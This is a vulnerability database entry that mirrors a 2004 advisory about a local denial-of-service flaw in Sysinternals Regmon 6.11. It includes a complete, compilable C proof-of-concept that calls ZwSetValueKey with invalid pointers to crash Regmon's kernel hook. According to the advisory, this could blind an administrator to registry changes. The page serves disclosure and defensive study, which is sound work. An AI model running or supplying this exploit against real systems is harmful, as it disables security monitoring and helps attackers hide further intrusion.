Sysinternals Regmon 6.11 Local Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Sysinternals Regmon 6.11 Local Denial of Service Vulnerabilit


                                                source: http://www.securityfocus.com/bid/11042/info

Regmon is reported prone to a local denial of service vulnerability. This issue presents itself because the application fails to handle exceptional conditions and references unvalidated pointers to kernel functions.

Successful exploitation may allow a local unauthorized attacker to cause a denial of service condition in the application. The attacker may then obfuscate changes to the registry from the administrator and carry out further attacks against a vulnerable computer.

Regmon 6.11 for NT/9x and prior versions are reportedly affected by this issue. 

/*
 *  ntregmon-dos.c (up to 6.11)
 *
 *  Copyright (c) 2002-2004 By Next Generation Security S.L.
 *  All rights reserved
 *  http://www.ngsec.com
 *
 *  Compiles with: cl ntregmon-dos.c
 *
 *  Madrid, August 2004
 */

#include &#60;windows.h&#62;

#define MY_NULL 0x01
typedef DWORD (* zwsetvaluekey_TYPE)(DWORD KeyHandle, DWORD ValueName, DWORD TitleIndex, DWORD Type, DWORD Data, DWORD DataSize);


int main(int argc, char *argv[]) {
HINSTANCE dll;
zwsetvaluekey_TYPE my_ZwSetValueKey;

  if ((dll=LoadLibrary(&#34;ntdll.dll&#34;))!=NULL) {

     if ((my_ZwSetValueKey=(zwsetvaluekey_TYPE)GetProcAddress(dll,&#34;ZwSetValueKey&#34;))!=NULL) {

         my_ZwSetValueKey(MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL);

     }
  }

}

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1